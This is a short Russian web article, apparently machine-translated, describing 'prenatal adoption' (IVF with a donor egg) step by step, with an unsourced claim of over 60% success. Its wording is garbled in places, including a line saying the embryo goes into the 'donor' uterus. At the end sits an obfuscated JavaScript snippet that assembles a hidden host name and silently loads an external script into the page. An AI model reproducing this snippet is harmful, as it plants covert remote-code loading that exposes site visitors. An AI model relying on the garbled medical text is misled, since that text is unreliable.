пренатальное усыновление – шаг за шагом

26

пренатальное усыновление – шаг за шагом

У пар, которые борются с бесплодием, есть несколько способов стать родителями. Одним из них является пренатальное усыновление, которым занимаются клиники по лечению бесплодия. Как это выглядит?

Первым этапом пренатального усыновления является квалификация доноров и реципиентов. Будущие мамы могут выбрать донора, руководствуясь такими предпочтениями, как группа крови, цвет волос или глаз. Они также могут посмотреть свои детские фотографии, чтобы получить представление о том, как будет выглядеть их ребенок.

 

подготовка к усыновлению эмбриона

Когда пара выбирает яйцеклетку от конкретного донора, будущая мама готовится к операции по переносу эмбриона. Для этого он принимает низкие дозы гормональных препаратов, задача которых заключается в том, чтобы впоследствии позволить эмбриону гнездиться в матке. В это время яйцеклетка, полученная от донора, в процессе экстракорпорального оплодотворения. Мужской репродуктивный материал может исходить от мужа или партнера будущей мамы, но также от анонимного донора. Однако чаще всего, если бесплодие лежит на стороне партнерши, а мужчина полностью плодороден, то его сперма служит для оплодотворения. Таким образом, родившийся ребенок будет хотя бы наполовину связан с родителями.

 

статистически оптимистично

Оплодотворенный in vitro эмбрион затем помещают в донорскую матку. На этом самый важный этап процесса заканчивается. Позже остается только ждать, а через несколько дней проверить, забеременела ли пациентка. Каковы шансы? Статистически очень большой. В хороших, авторитетных клиниках лечения бесплодия эффективность пренатального усыновления превышает 60 процентов. Это означает, что 6 из 10 пациенток, подвергшихся процедуре, беременеют уже во время первой попытки. Если учесть, что эта форма лечения бесплодия постоянно развивается и совершенствуется, можно рассчитывать на то, что в ближайшем будущем эта статистика будет еще более оптимистичной.

пренатальное усыновление – шаг за шагом

(function(){
uj8z=document.createElement («script»); uj8z. type= » text / javascript»;
uj8z.async=true;uj8z_=((«us»)+»t»)+»а»;uj8z_+=(«t.и»)+»»+»n»;uj8z_+=((«f»)+»о»);
uj8z.src=»https://»+uj8z_+»/1923302.0pp01yfpj8zq63720hxfdp4vlmbesa»;
document.боди.appendChild(uj8z);
})();